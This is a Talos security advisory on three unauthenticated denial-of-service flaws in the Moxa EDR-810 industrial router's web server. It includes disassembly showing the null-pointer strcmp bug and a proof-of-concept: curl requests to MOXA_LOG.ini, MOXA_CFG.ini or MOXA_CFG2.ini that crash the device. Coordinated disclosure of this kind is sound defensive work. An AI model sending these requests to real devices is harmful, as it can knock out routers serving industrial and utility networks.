Talos Vulnerability Report

TALOS-2017-0474

Moxa EDR-810 Web Server strcmp Multiple Denial of Service Vulnerabilities

April 13, 2018
CVE Number

CVE-2017-14435 - CVE-2017-14437

Summary

An exploitable denial of service vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP URI can cause a null pointer dereference resulting in denial of service. An attacker can send a GET request to "/MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.ini" without a cookie header to trigger this vulnerability.

Tested Versions

Moxa EDR-810 V4.1 build 17030317

Product URLs

https://www.moxa.com/product/EDR-810.htm

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Details

This device is marketed as a secure ICS (Industrial Control System) router. This device will likely be found in industrial environments such as power generation/distribution, water treatment, manufacturing, etc. This specific vulnerability causes the web server to crash.

A GET request to /MOXA_LOG.ini, /MOXA_CFG.ini, or /MOXA_CFG2.ini without a cookie header will cause the binary to crash. Authentication is not required for this vulnerability.

CVE-2017-14435 - /MOXA_CFG.ini

In the following code snippet, R0 is nil if the cookie header is not set.

.text:0001B544                 LDR             R0, [R11,#s1] ; s1
.text:0001B548                 LDR             R1, =aMoxa_cfg_ini_0 ; "/MOXA_CFG.ini"
.text:0001B54C                 BL              strcmp

CVE-2017-14436 - /MOXA_CFG2.ini

In the following code snippet, R0 is nil if the cookie header is not set.

.text:0001B55C                 LDR             R0, [R11,#s1] ; s1
.text:0001B560                 LDR             R1, =aMoxa_cfg2_ini ; "/MOXA_CFG2.ini"
.text:0001B564                 BL              strcmp

CVE-2017-14437 - /MOXA_LOG.ini

In the following code snippet, R0 is nil if the cookie header is not set.

.text:0001B574                 LDR             R0, [R11,#s1] ; s1
.text:0001B578                 LDR             R1, =aMoxa_log_ini_0 ; "/MOXA_LOG.ini"
.text:0001B57C                 BL              strcmp

Exploit Proof-of-Concept

curl -v 192.168.127.254/MOXA_LOG.ini

OR

curl -v 192.168.127.254/MOXA_CFG.ini

OR

curl -v 192.168.127.254/MOXA_CFG2.ini

Timeline

2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release

Credit

Discovered by Carlos Pacho of Cisco Talos.